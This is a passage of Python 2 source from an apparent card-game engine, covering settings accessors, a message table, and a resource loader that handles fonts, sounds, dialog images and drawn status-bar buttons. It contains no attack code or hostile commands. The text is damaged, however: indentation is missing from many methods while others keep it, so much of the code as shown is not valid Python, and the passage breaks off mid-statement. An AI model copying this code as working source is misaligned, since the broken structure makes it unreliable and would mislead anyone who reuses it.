    def curtaincolour(self):
        return self.get_drawsetting().curtaincolour
    @property
    def blcurtaincolour(self):
        return self.get_drawsetting().blcurtaincolour
    @property
    def fullscreenbackgroundtype(self):
        return self.get_drawsetting().fullscreenbackgroundtype
    @property
    def fullscreenbackgroundfile(self):
        return self.get_drawsetting().fullscreenbackgroundfile
    @property
    def bordering_cardname(self):
        # Whether card names are drawn with an outline border.
        return self.get_fontsetting().bordering_cardname
    @property
    def decorationfont(self):
        return self.get_fontsetting().decorationfont
    @property
    def fontsmoothing_message(self):
        return self.get_fontsetting().fontsmoothing_message
    @property
    def fontsmoothing_cardname(self):
        return self.get_fontsetting().fontsmoothing_cardname
    @property
    def fontsmoothing_statusbar(self):
        return self.get_fontsetting().fontsmoothing_statusbar
    @property
    def basefont(self):
        return self.get_fontsetting().basefont
    @property
    def fonttypes(self):
        return self.get_fontsetting().fonttypes
def is_logscrollable(self):
return self.messagelog_type <> LOG_SINGLE
    def write(self):
        """Persist the current settings through cw.xmlcreater."""
        cw.xmlcreater.create_settings(self)
@staticmethod
def wrap_volumevalue(value):
return cw.util.numwrap(value, 0, 100) / 100.0
@staticmethod
def wrap_colorvalue(r, g, b, a):
r = cw.util.numwrap(r, 0, 255)
g = cw.util.numwrap(g, 0, 255)
b = cw.util.numwrap(b, 0, 255)
a = cw.util.numwrap(a, 0, 255)
return (r, g, b, a)
def get_scedir(self, skintype=None):
if skintype is None:
skintype = self.skintype
scedir = u"Scenario"
# 設定に応じて初期位置を変更する
if self.selectscenariofromtype:
for skintype2, folder in self.folderoftype:
if skintype2 == skintype:
folder = cw.util.get_linktarget(folder)
if os.path.isdir(folder):
scedir = folder
break
return scedir
def insert_yadoorder(self, yadodirname):
seq = []
for dname, order in self.yado_order.items():
seq.append((order, dname))
self.yado_order.clear()
self.yado_order[yadodirname] = 0
o = 1
for _, dname in sorted(seq):
if dname == yadodirname:
continue
self.yado_order[dname] = o
o += 1
pass
class _MsgDict(dict):
    """Message table that reports missing message IDs.

    Looking up an ID that is not registered schedules an error dialog
    (once per ID) on the frame and yields u"*ERROR*" instead of raising
    KeyError.
    """
    def __init__(self):
        dict.__init__(self)
        # IDs already reported, so each missing ID is announced once.
        self._error_keys = set()

    def __getitem__(self, key):
        if key in self:
            return dict.__getitem__(self, key)
        if key not in self._error_keys:
            def func():
                if cw.cwpy.frame:
                    s = u"メッセージID[%s]に該当するメッセージがありません。\n"\
                        u"デイリービルド版でこのエラーが発生した場合は、" \
                        u"「Data/SkinBase」以下のリソースが最新版になっていない"\
                        u"可能性があります。" % (key)
                    dlg = cw.dialog.message.ErrorMessage(None, s)
                    dlg.ShowModal()
                    dlg.Destroy()
            cw.cwpy.frame.exec_func(func)
            self._error_keys.add(key)
        return u"*ERROR*"
class Resource(object):
def __init__(self, setting):
self.setting = weakref.ref(setting)
# 現在選択しているスキンのディレクトリ
self.skindir = setting.skindir
# 各種データの拡張子
self.ext_img = cw.M_IMG
self.ext_bgm = cw.M_MSC
self.ext_snd = cw.M_SND
# システムフォントテーブルの設定
self.fontpaths = self.get_fontpaths()
self.fontnames, self.fontnames_init = self.set_systemfonttable()
# 効果音
self.init_sounds()
# システムメッセージ(辞書)
self.msgs = self.get_msgs(setting)
# wxダイアログのボタン画像(辞書)
# wxスレッドから初期化
self.buttons = ResourceTable("Button", {}.copy(), empty_wxbmp)
# カード背景画像(辞書)
self.cardbgs = self.get_cardbgs(cw.util.load_image)
self.cardnamecolorhints = self.get_cardnamecolorhints(self.cardbgs)
# wxダイアログで使う画像(辞書)
self.pygamedialogs = self.get_dialogs(cw.util.load_image)
# wx版。wxスレッドから初期化
self.dialogs = ResourceTable("Dialog", {}.copy(), empty_wxbmp)
# デバッガで使う画像(辞書)
self.pygamedebugs = self.get_debugs(cw.util.load_image, cw.s)
# wx版。wxスレッドから初期化
self.debugs = ResourceTable("Debug", {}.copy(), empty_wxbmp)
# ダイアログで使うカーソル(辞書)
# wxスレッドから初期化
self.cursors = ResourceTable("Cursor", {}.copy(), empty_wxbmp)
# 特殊文字の画像(辞書)
self.specialchars_is_changed = False
self.specialchars = self.get_specialchars()
# プレイヤカードのステータス画像(辞書)
self.statuses = self.get_statuses(cw.util.load_image)
# 適性値・使用回数値画像(辞書)
self.stones = self.get_stones()
# wx版。wxスレッドから初期化
self.wxstones = ResourceTable("Stone", {}.copy(), empty_wxbmp)
# 使用フォント(辞書)。スプライトを作成するたびにフォントインスタンスを
# 新規作成すると重いのであらかじめ用意しておく(wxスレッドから初期化)
self.fonts = self.create_fonts()
# StatusBarで使用するボタンイメージ
self._statusbtnbmp0 = {}
self._statusbtnbmp1 = {}
self._statusbtnbmp2 = {}
self.ignorecase_table = {}
cw.cwpy.frame.exec_func(self.init_wxresources)
if sys.platform <> "win32":
# FIXME: 大文字・小文字を区別しないシステムでリソース内のファイルの
# 取得に失敗する事があるので、すべて小文字のパスをキーにして
# 真のファイル名へのマッピングをしておく。
# 主にこの問題は手書きされる'*.jpy1'内で発生する。
for res in ("Table", "Bgm", "Sound", "BgmAndSound", "Resource/Image"):
resdir = cw.util.join_paths(self.skindir, res)
for dpath, dnames, fnames in os.walk(resdir):
for fname in fnames:
path = cw.util.join_paths(dpath, fname)
if os.path.isfile(path):
self.ignorecase_table[path.lower()] = path
def get_filepath(self, fpath):
if not fpath or os.path.isfile(fpath) or cw.binary.image.path_is_code(fpath):
return fpath
if self.ignorecase_table or (cw.cwpy.sdata and cw.cwpy.sdata.ignorecase_table):
lpath = fpath.lower()
if lpath in self.ignorecase_table:
fpath = self.ignorecase_table.get(lpath, fpath)
elif cw.cwpy.sdata and cw.cwpy.sdata.ignorecase_table:
fpath = cw.cwpy.sdata.ignorecase_table.get(lpath, fpath)
return fpath
def dispose(self):
for key in self.fonts.iterkeys():
if self.fonts.is_loaded(key):
font = self.fonts[key]
if isinstance(font, cw.imageretouch.Font):
font.dispose()
@property
def cardnamecolorborder(self):
if cw.cwpy.setting.bordering_cardname:
return 92
else:
return 116
    def update_winscale(self):
        """Rebuild the wx-side resources after the window scale changes."""
        self.init_wxresources()
    def init_sounds(self):
        """Load the skin's sound effects and the system sound table."""
        # Other sound effects bundled with the skin (dict)
        self.skinsounds = self.get_skinsounds()
        # System sound effects (dict)
        self.sounds = self.get_sounds(self.setting(), self.skinsounds)
    def init_wxresources(self):
        """Initialize the wx-side resources."""
        # Button images for wx dialogs (dict)
        self.buttons = self.get_buttons()
        # Images used by wx dialogs (dict)
        self.dialogs = self.get_dialogs(cw.util.load_wxbmp)
        # Images used by the debugger (dict)
        self.debugs = self.get_debugs(cw.util.load_wxbmp, cw.ppis)
        self.debugs_noscale = self.get_debugs(cw.util.load_wxbmp, lambda bmp: bmp)
        # Cursors used by dialogs (dict)
        self.cursors = self.get_cursors()
        # Aptitude / use-count stone images (dict)
        self.wxstones = self.get_wxstones()
        # Player-card status images (dict)
        self.wxstatuses = self.get_statuses(cw.util.load_wxbmp)
        # Card background images (dict)
        self.wxcardbgs = self.get_cardbgs(cw.util.load_wxbmp)
    def init_debugicon(self):
        """Reload the debugger icons after the editor settings change."""
        def func():
            self.pygamedebugs = self.get_debugs(cw.util.load_image, cw.s)
        # The pygame-side table is rebuilt via cw.cwpy.exec_func; the
        # wx-side tables are rebuilt directly below.
        cw.cwpy.exec_func(func)
        self.debugs = self.get_debugs(cw.util.load_wxbmp, cw.ppis)
        self.debugs_noscale = self.get_debugs(cw.util.load_wxbmp, lambda bmp: bmp)
    def get_fontpaths(self):
        """
        Font paths (dict): map font-file keys to bundled font files,
        preferring the skin's own Resource/Font directory.

        Raises NoFontError when neither the bundled file nor the named
        substitute facename is available.
        """
        fontdir = "Data/Font"
        fontdir_skin = cw.util.join_paths(self.skindir, "Resource/Font")
        # NOTE(review): every tuple here references "gothic.ttf", so the
        # resulting dict collapses to the single key "gothic" — unlike
        # get_fontpaths_s below, which uses distinct file names.  Possibly
        # intentional (ship one font file), but confirm.
        fnames = (("gothic.ttf", u"MS ゴシック"), ("gothic.ttf", u"MS UI Gothic"),
                  ("gothic.ttf", u"MS 明朝"), ("gothic.ttf", u"MS Pゴシック"),
                  ("gothic.ttf", u"MS P明朝"))
        d = {}
        self.facenames = set(wx.FontEnumerator().GetFacenames())
        for fname, alt in fnames:
            path = cw.util.join_paths(fontdir_skin, fname)
            if not os.path.isfile(path):
                path = cw.util.join_paths(fontdir, fname)
                if not os.path.isfile(path):
                    if alt in self.facenames:
                        # A system substitute exists; skip the file.
                        continue
                    else:
                        # Neither the IPA font nor a substitute exists.
                        raise NoFontError(fname + " not found.")
            d[os.path.splitext(fname)[0]] = path
        return d
@staticmethod
def get_fontpaths_s(fontdir, facenames):
d = {}
fnames = (("gothic.ttf", u"MS ゴシック"), ("uigothic.ttf", u"MS UI Gothic"),
("mincho.ttf", u"MS 明朝"), ("pgothic.ttf", u"MS Pゴシック"),
("pmincho.ttf", u"MS P明朝"))
for fname, alt in fnames:
path = cw.util.join_paths(fontdir, fname)
if not os.path.isfile(path):
if alt in facenames:
continue
else:
# IPAフォントも代替フォントも存在しない場合はエラー
raise NoFontError(fname + " not found.")
d[os.path.splitext(fname)[0]] = path
return d
@staticmethod
def install_defaultfonts(fontpaths, facenames, d):
if sys.platform == "win32":
winplatform = sys.getwindowsversion()[3]
for name, path in fontpaths.items():
fontname = cw.util.get_truetypefontname(path)
if fontname in facenames or\
fontname == u"Ume Hy Gothic" and (u"梅Hyゴシック" in facenames):
d[name] = fontname
continue
def func():
gdi32 = ctypes.WinDLL("gdi32")
if winplatform == 2:
gdi32.AddFontResourceExW.argtypes = (ctypes.c_wchar_p, ctypes.wintypes.DWORD, ctypes.c_void_p)
gdi32.AddFontResourceExW(path, 0x10, 0)
else:
gdi32.AddFontResourceW.argtypes = (ctypes.c_wchar_p)
gdi32.AddFontResourceW(path)
user32 = ctypes.windll.user32
HWND_BROADCAST = 0xFFFF
WM_FONTCHANGE = 0x001D
user32.SendMessageA(HWND_BROADCAST, WM_FONTCHANGE, 0, 0)
thr = threading.Thread(target=func)
thr.start()
if fontname:
if not d is None:
d[name] = fontname
else:
raise ValueError("Failed to get facename from %s" % name)
    def set_systemfonttable(self):
        """
        Set up the system font table.
        Returns (current, initial) facename dicts keyed by the font
        file name; *current* reflects user overrides from local settings.
        """
        d = {}
        if sys.platform == "win32":
            Resource.install_defaultfonts(self.fontpaths, self.facenames, d)
            self.facenames = set(wx.FontEnumerator().GetFacenames())
        else:
            # Non-Windows: every key maps to the Ume gothic face.
            d["gothic"],d["uigothic"],d["mincho"],d["pmincho"],d["pgothic"] = ((u"梅Hyゴシック",)*5)
        for value in d.itervalues():
            if not value in self.facenames:
                raise ValueError(u"font not found: " + value)
        init = d.copy()
        # Apply replacements configured in the local settings
        for basetype in d.iterkeys():
            font = self.setting().local.basefont[basetype]
            if font:
                d[basetype] = font
        return d, init
    def clear_systemfonttable(self):
        """Unregister the bundled fonts on Windows.

        Skipped on the NT family (platform id 2), matching the private
        registration path used in install_defaultfonts.
        """
        if sys.platform == "win32" and not sys.getwindowsversion()[3] == 2:
            gdi32 = ctypes.windll.gdi32
            for path in self.fontpaths.itervalues():
                # NOTE(review): registration used AddFontResourceW (wide),
                # but removal uses the ANSI RemoveFontResourceA — confirm
                # this actually matches on non-NT Windows.
                gdi32.RemoveFontResourceA(path)
            user32 = ctypes.windll.user32
            HWND_BROADCAST = 0xFFFF
            WM_FONTCHANGE = 0x001D
            user32.SendMessageA(HWND_BROADCAST, WM_FONTCHANGE, 0, 0)
def get_fontfromtype(self, name):
"""フォントタイプ名から抽象フォント名を取得する。"""
basename = self.setting().fonttypes.get(name, (name, "", -1, None, None, None))
basename, fontname, pixels, bold, bold_upscr, italic = basename
if basename:
fontname = self.setting().basefont[basename]
if not fontname:
fontname = self.fontnames.get(basename, "")
return fontname, pixels, bold, bold_upscr, italic
def get_wxfont(self, name="uigothic", size=None, pixelsize=None,
family=wx.DEFAULT, style=wx.NORMAL, weight=wx.BOLD, encoding=wx.FONTENCODING_SYSTEM,
adjustsize=False, adjustsizewx3=True, pointsize=None):
if size is None and pixelsize is None:
pixelsize = cw.wins(14)
fontname, _pixels, bold, bold_upscr, italic = self.get_fontfromtype(name)
if cw.UP_SCR <= 1:
if not bold is None:
weight = wx.FONTWEIGHT_BOLD if bold else wx.FONTWEIGHT_NORMAL
else:
if not bold_upscr is None:
weight = wx.FONTWEIGHT_BOLD if bold_upscr else wx.FONTWEIGHT_NORMAL
if not italic is None:
style = wx.ITALIC if italic else wx.FONTSTYLE_NORMAL
if pointsize is None:
# FIXME: ピクセルサイズで指定しないと96DPIでない時にゲーム画面が
# おかしくなるので暫定的に96DPI相当のサイズに強制変換
if not pixelsize:
pixelsize = int((1.0/72 * 96) * size + 0.5)
elif 3 <= wx.VERSION[0] and adjustsizewx3:
# FIXME: wxPython 3.0.1.1でフォントが1ピクセル大きくなってしまった
pixelsize -= 1
# BUG: フォントサイズとテキストによっては
# ツリーアイテムの後方が欠ける事がある
if (name in ("tree") or adjustsize) and 15 < pixelsize and pixelsize % 2 == 1:
pixelsize += 1
wxfont = wx.FontFromPixelSize((0, pixelsize), family, style, weight, 0, fontname, encoding)
else:
wxfont = wx.Font(pointsize, family, style, weight, 0, fontname, encoding)
return wxfont
def create_font(self, type, basetype, fontname, size_noscale, defbold, defbold_upscr, defitalic, pixelsadd=0, nobold=False):
fontname, pixels_noscale, bold, bold_upscr, italic = self.get_fontfromtype(type)
if pixels_noscale <= 0:
pixels_noscale = size_noscale
pixels_noscale += pixelsadd
if bold is None:
bold = defbold
if bold_upscr is None:
bold_upscr = defbold_upscr
if italic is None:
italic = defitalic
if nobold:
bold = False
bold_upscr = False
if cw.UP_SCR > 1:
bold = bold_upscr
return cw.imageretouch.Font(fontname, -cw.s(pixels_noscale), bold=bold, italic=italic)
def create_fonts(self):
"""ゲーム内で頻繁に使用するpygame.Fontはここで設定する。"""
# 使用フォント(辞書)
fonts = ResourceTable("Font", {}.copy(), lambda: None)
# 所持カードの使用回数描画用
t = self.setting().fonttypes["uselimit"]
fonts.set("card_uselimit", self.create_font, "uselimit", t[0], t[1], t[2], t[3], t[4], t[5])
# メニューカードの名前描画用
t = self.setting().fonttypes["cardname"]
fonts.set("mcard_name", self.create_font, "cardname", t[0], t[1], t[2], t[3], t[4], t[5])
# プレイヤカードの名前描画用
t = self.setting().fonttypes["ccardname"]
fonts.set("pcard_name", self.create_font, "ccardname", t[0], t[1], t[2], t[3], t[4], t[5])
# プレイヤカードのレベル描画用
t = self.setting().fonttypes["level"]
fonts.set("pcard_level", self.create_font, "level", t[0], t[1], t[2], t[3], t[4], t[5])
# メッセージウィンドウのテキスト描画用
t = self.setting().fonttypes["message"]
fonts.set("message", self.create_font, "message", t[0], t[1], t[2], t[3], t[4], t[5], nobold=True)
# メッセージウィンドウの選択肢描画用
t = self.setting().fonttypes["selectionbar"]
fonts.set("selectionbar", self.create_font, "selectionbar", t[0], t[1], t[2], t[3], t[4], t[5])
# メッセージログのページ表示描画用
t = self.setting().fonttypes["logpage"]
fonts.set("backlog_page", self.create_font, "logpage", t[0], t[1], t[2], t[3], t[4], t[5])
# カード枚数描画用
t = self.setting().fonttypes["numcards"]
fonts.set("numcards", self.create_font, "numcards", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーパネル描画用
t = self.setting().fonttypes["sbarpanel"]
fonts.set("sbarpanel", self.create_font, "sbarpanel", t[0], t[1], t[2], t[3], t[4], t[5])
# 進行状況・音量バー描画用
t = self.setting().fonttypes["sbarprogress"]
fonts.set("sbarprogress", self.create_font, "sbarprogress", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーボタン描画用
t = self.setting().fonttypes["sbarbtn"]
fonts.set("sbarbtn", self.create_font, "sbarbtn", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーボタン解説描画用
t = self.setting().fonttypes["sbardesc"]
fonts.set("sbardesc", self.create_font, "sbardesc", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータスバーボタン解説の表題描画用
t = self.setting().fonttypes["sbardesctitle"]
fonts.set("sbardesctitle", self.create_font, "sbardesctitle", t[0], t[1], t[2], t[3], t[4], t[5])
# ステータス画像の召喚回数描画用
t = self.setting().fonttypes["statusnum"]
fonts.set("statusimg1", self.create_font, "statusnum", t[0], t[1], t[2], t[3], t[4], t[5])
t = self.setting().fonttypes["statusnum"]
fonts.set("statusimg2", self.create_font, "statusnum", t[0], t[1], t[2], t[3], t[4], t[5], pixelsadd=-2)
fonts.set("statusimg3", self.create_font, "statusnum", t[0], t[1], t[2], t[3], t[4], t[5], pixelsadd=-4)
t = self.setting().fonttypes["screenshot"]
fonts.set("screenshot", self.create_font, "screenshot", t[0], t[1], t[2], t[3], t[4], t[5])
return fonts
    def create_wxbutton(self, parent, cid, size, name=None, bmp=None , chain=False):
        """Create a wx button from either a text label or a bitmap.

        chain=True builds a toggle-style bitmap button that keeps firing
        click events at the configured repeat interval while held down.
        """
        if name:
            button = wx.Button(parent, cid, name, size=size)
            button.SetFont(self.get_wxfont("button"))
            button.SetMinSize(size)
        elif bmp:
            if chain:
                #button = wx.BitmapButton(parent, cid, bmp, style=wx.BORDER_MASK)
                import wx.lib.buttons as buttons
                #button = buttons.GenBitmapButton(parent, cid, None, style=wx.BORDER_NONE)
                #button.SetBitmapLabel(bmp)
                if size[0] == cw.wins(30):
                    button = buttons.GenBitmapToggleButton(parent, cid, bmp, style=wx.BORDER_NONE)
                    #button = wx.lib.buttons.ThemedGenBitmapToggleButton(parent, cid, bmp,
                    #                                                    style=wx.BORDER_NONE | wx.NO_BORDER)
                else:
                    button = buttons.GenBitmapToggleButton(parent, cid, bmp, style=0)
                button.SetBezelWidth(1)
                button.SetUseFocusIndicator(False)
                #button.InitColours()
                #button.SetBitmapSelected(bmp)
                #mask = wx.Mask(bmp, wx.BLUE)
                #bmp.SetMask(mask)
            else:
                button = wx.BitmapButton(parent, cid, bmp)
            button.SetMinSize(size)
            bmp = cw.imageretouch.to_disabledimage(bmp)
            button.SetBitmapDisabled(bmp)
        if chain:
            # While the button is held down, fire press events at a
            # fixed interval.
            timer = wx.Timer(button)
            timer.running = False
            def starttimer(event):
                if not timer.running:
                    timer.running = True
                    button.SetToggle(True)
                    btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, button.GetId())
                    button.ProcessEvent(btnevent)
                    timer.Start(cw.cwpy.setting.move_repeat, wx.TIMER_ONE_SHOT)
            def timerfunc(event):
                # Forward a click, then re-arm the one-shot timer.
                btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, button.GetId())
                button.ProcessEvent(btnevent)
                starttimer(event)
            def stoptimer(event):
                timer.Stop()
                event.Skip()
                timer.running = False
                button.SetToggle(False)
            # enterbutton is currently unused (its binding below is
            # commented out); kept for the disabled hover styling.
            def enterbutton(event):
                button.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_INACTIVEBORDER))
            def leavebutton(event):
                button.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_BTNFACE))
                stoptimer(event)
            button.Bind(wx.EVT_TIMER, timerfunc)
            button.Bind(wx.EVT_LEFT_DOWN, starttimer)
            button.Bind(wx.EVT_LEFT_DCLICK, starttimer)
            #button.Bind(wx.EVT_TOGGLEBUTTON, starttimer)
            button.Bind(wx.EVT_LEFT_UP, stoptimer)
            #button.Bind(wx.EVT_ENTER_WINDOW, enterbutton)
            button.Bind(wx.EVT_LEAVE_WINDOW, leavebutton)
        return button
def create_wxbutton_dbg(self, parent, cid, size, name=None, bmp=None):
if name:
button = wx.Button(parent, cid, name, size=size)
button.SetMinSize(size)
button.SetFont(self.get_wxfont("button", pointsize=9))
elif bmp:
button = wx.BitmapButton(parent, cid, bmp)
button.SetMinSize(size)
bmp = cw.imageretouch.to_disabledimage(bmp)
button.SetBitmapDisabled(bmp)
return button
@staticmethod
def create_cornerimg(rgb):
r, g, b = rgb
linedata = struct.pack(
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB",
r, g, b, 255, r, g, b, 255, r, g, b, 255, r, g, b, 255, r, g, b, 255, r, g, b, 255,
r, g, b, 255, r, g, b, 255, r, g, b, 224, r, g, b, 128, r, g, b, 68, r, g, b, 40,
r, g, b, 255, r, g, b, 224, r, g, b, 68, r, g, b, 0, r, g, b, 0, r, g, b, 0,
r, g, b, 255, r, g, b, 128, r, g, b, 0, r, g, b, 0, r, g, b, 0, r, g, b, 0,
r, g, b, 255, r, g, b, 68, r, g, b, 0, r, g, b, 0, r, g, b, 0, r, g, b, 0,
r, g, b, 255, r, g, b, 40, r, g, b, 0, r, g, b, 0, r, g, b, 0, r, g, b, 0
)
topleft = pygame.image.fromstring(linedata, (6, 6), "RGBA")
topright = pygame.transform.flip(topleft, True, False)
bottomleft = pygame.transform.flip(topleft, False, True)
bottomright = pygame.transform.flip(topleft, True, True)
return topleft, topright, bottomleft, bottomright
@staticmethod
def draw_frame(bmp, rect, color):
topleft, topright, bottomleft, bottomright = Resource.create_cornerimg(color)
pygame.draw.rect(bmp, color, rect, 1)
x, y, w, h = rect
bmp.blit(topleft, (x, y))
bmp.blit(topright, (x+w-6, y))
bmp.blit(bottomleft, (x, y+h-6))
bmp.blit(bottomright, (x+w-6, y+h-6))
Resource.draw_corneroutimg(bmp, rect)
@staticmethod
def draw_corneroutimg(bmp, rect=None, outframe=0):
outdata = struct.pack(
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB",
0,0,0,255, 0,0,0,255, 0,0,0,188, 0,0,0,128, 0,0,0, 0, 0,0,0, 0,
0,0,0,255, 0,0,0,128, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0,188, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0,128, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0,
0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0, 0,0,0, 0
)
topleft = pygame.image.fromstring(outdata, (6, 6), "RGBA")
topright = pygame.transform.flip(topleft, True, False)
bottomleft = pygame.transform.flip(topleft, False, True)
bottomright = pygame.transform.flip(topleft, True, True)
if not rect:
rect = bmp.get_rect()
x, y, w, h = rect
o = outframe
bmp.blit(topleft, (x+o, y+o), special_flags=pygame.locals.BLEND_RGBA_SUB)
bmp.blit(topright, (x+w-6-o, y+o), special_flags=pygame.locals.BLEND_RGBA_SUB)
bmp.blit(bottomleft, (x+o, y+h-6-o), special_flags=pygame.locals.BLEND_RGBA_SUB)
bmp.blit(bottomright, (x+w-6-o, y+h-6-o), special_flags=pygame.locals.BLEND_RGBA_SUB)
def _create_statusbtnbmp(self, w, h, flags=0):
    """Create an OS-native looking button image as a pygame.Surface.

    w, h: button size in pixels (already scaled).
    flags: bitwise OR of SB_PRESSED / SB_CURRENT / SB_DISABLE /
           SB_NOTICE / SB_EMPHASIZE.
    On Windows the native theme renderer is tried first; on any failure
    (or on other platforms) the button is drawn manually with pygame.
    """
    try:
        if sys.platform == "win32":
            # Render with the native Win32 theme renderer.
            wxbmp = wx.EmptyBitmapRGBA(w, h)
            dc = wx.MemoryDC(wxbmp)
            render = wx.RendererNative.Get()
            # Only the base (the widest, full status bar button) is
            # always drawn in the selected (pressed) color.
            # NOTE(review): if DrawPushButton raises after this
            # assignment, the pygame fallback below sees a wx flag
            # value in `flags` — confirm SB_* and wx.CONTROL_* values
            # are compatible.
            if w > cw.s(600):
                flags = wx.CONTROL_PRESSED
            render.DrawPushButton(cw.cwpy.frame, dc, (cw.s(0), cw.s(0), w, h), flags)
            dc.EndDrawing()
            wximg = wxbmp.ConvertToImage()
            pixel_num = w * h
            if wximg.GetAlphaData() == "\x00" * pixel_num:
                # The renderer can leave the alpha channel fully
                # transparent; force it opaque in that case.
                wximg.SetAlphaData("\xFF" * pixel_num)
                wxbmp = wximg.ConvertToBitmap()

            def conv2surface(wxbmp):
                """Convert a wx.Bitmap to a pygame.Surface.
                wxbmp: wx.Bitmap
                """
                w, h = wxbmp.GetSize()
                wximg = wxbmp.ConvertToImage()
                if wxbmp.HasAlpha():
                    data = wximg.GetData()
                    # wx.Image.GetData() is a flat RGBRGB... byte
                    # string: red at offset 0, green at 1, blue at 2
                    # of each 3-byte pixel.
                    # BUGFIX: all three slices used [2::3], which
                    # filled the R and G channels with the blue data.
                    r_data = data[0::3]
                    g_data = data[1::3]
                    b_data = data[2::3]
                    a_data = wximg.GetAlphaData()
                    seq = []
                    for cnt in xrange(w * h):
                        seq.append((r_data[cnt] + g_data[cnt] + b_data[cnt] + a_data[cnt]))
                    buf = "".join(seq)
                    image = pygame.image.frombuffer(buf, (w, h), "RGBA").convert_alpha()
                else:
                    wximg = wxbmp.ConvertToImage()
                    buf = wximg.GetData()
                    image = pygame.image.frombuffer(buf, (w, h), "RGB").convert()
                    if wximg.HasMask():
                        image.set_colorkey(wximg.GetOrFindMaskColour(), RLEACCEL)
                return image
            return conv2surface(wxbmp)
    except:
        # Fall through to the manually drawn button below.
        pass

    topleft, topright, bottomleft, bottomright = Resource.create_cornerimg((208, 208, 208))

    def subtract_corner(value):
        # Darken the color of the rounded corner pieces.
        color = (value, value, value, 0)
        topleft.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
        topright.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
        bottomleft.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)
        bottomright.fill(color, special_flags=pygame.locals.BLEND_RGBA_SUB)

    # BUGFIX: this creation line was commented out, leaving `bmp`
    # undefined (NameError) on the non-win32 path.
    bmp = pygame.Surface((w, h)).convert_alpha()
    if flags & SB_DISABLE:
        r1 = g1 = b1 = 240
        bmp.fill((r1, g1, b1))
    else:
        r1 = g1 = b1 = 250
        bmp.fill((r1, g1, b1))
    # Frame: the four corners get the rounded corner images.
    if flags & SB_PRESSED:
        # A pressed button darkens its top and left edges.
        if not (flags & SB_CURRENT):
            subtract_corner(8)
            color = (200, 200, 200)
        else:
            color = (208, 208, 208)
        pygame.draw.line(bmp, color, (2, 3), (w-4, 3))
        subtract_corner(8)
        bmp.blit(topleft, (2, 3))
        bmp.blit(topright, (w-6-1, 3))
        if not (flags & SB_CURRENT):
            color = (192, 192, 192)
        else:
            color = (200, 200, 200)
        pygame.draw.rect(bmp, color, (2, 2, w-3, h-3), 1)
        bmp.blit(topleft, (2, 2))
        bmp.blit(topright, (w-6-1, 2))
        bmp.blit(bottomleft, (2, h-6-1))
        subtract_corner(64)
        color = (128, 128, 128)
    elif flags & SB_DISABLE:
        subtract_corner(16)
        color = (192, 192, 192)
    else:
        subtract_corner(72)
        color = (128, 128, 128)
    if flags & SB_EMPHASIZE:
        # Shift the line color towards red (drop green/blue, add red).
        emcolor = (0, 128, 128, 0)
        topleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        topright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        bottomleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        bottomright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        color = (color[0], max(0, color[1]-128), max(0, color[2]-128))
        emcolor = (96, 0, 0, 0)
        topleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
        topright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
        bottomleft.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
        bottomright.fill(emcolor, special_flags=pygame.locals.BLEND_RGBA_ADD)
        color = (min(255, color[0]+96), color[1], color[2])
    if not (flags & SB_CURRENT) and not (flags & SB_DISABLE):
        # A non-hovered, enabled button gets a lighter frame.
        opacity = 92
        lightcolor = (0, 0, 0, opacity)
        topleft.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        topright.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        bottomleft.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        bottomright.fill(lightcolor, special_flags=pygame.locals.BLEND_RGBA_SUB)
        linecolor = (color[0], color[1], color[2], 255-opacity)
    else:
        linecolor = color
    pygame.draw.rect(bmp, linecolor, (1, 1, w-2, h-2), 1)
    bmp.blit(topleft, (1, 1))
    bmp.blit(topright, (w-6-1, 1))
    bmp.blit(bottomleft, (1, h-6-1))
    bmp.blit(bottomright, (w-6-1, h-6-1))
    if not (flags & SB_PRESSED):
        # Add a highlight: a 6x6 gradient corner tile packed by hand,
        # flipped for the other three corners.
        linedata = struct.pack(
            "BBBB BBBB BBBB BBBB BBBB BBBB"
            "BBBB BBBB BBBB BBBB BBBB BBBB"
            "BBBB BBBB BBBB BBBB BBBB BBBB"
            "BBBB BBBB BBBB BBBB BBBB BBBB"
            "BBBB BBBB BBBB BBBB BBBB BBBB"
            "BBBB BBBB BBBB BBBB BBBB BBBB",
